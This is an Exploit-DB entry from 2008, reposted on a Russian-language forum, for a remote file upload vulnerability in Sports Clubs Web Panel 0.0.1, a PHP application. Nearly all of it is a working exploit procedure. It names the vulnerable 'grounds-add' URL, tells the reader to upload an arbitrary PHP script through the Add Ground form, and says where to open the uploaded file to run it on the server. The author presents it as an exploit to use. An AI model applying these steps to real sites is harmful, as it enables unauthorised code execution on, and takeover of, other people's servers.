- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6439
- Проверка EDB
-
- Пройдено
- Автор
- STACK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2008-09-12
Код:
--==+============================================================================+==--
--==+ Sports Clubs Web Panel 0.0.1 Remote File upload +==--
--==+============================================================================+==--
[*] Discovered By: Stack
[+] Discovered On: 11 Sep 2008
[+] Download: http://sourceforge.net/project/downloading.php?group_id=188949&use_mirror=ovh&filename=sportspanel-0.0.1a.tar.gz&50146370
hello guys in this script admin need make a directory name grounds in public directory of script for the 'Add Ground' functions work
so then its will be useful for us use this exploit :d
Exploit :
http://localhost/sport/?p=grounds-add
after write any nae in Ground Name select
upload you php script and go to
http://localhost/sport/grounds/
you can see your php file uploaded
# milw0rm.com [2008-09-12]
- Источник
- www.exploit-db.com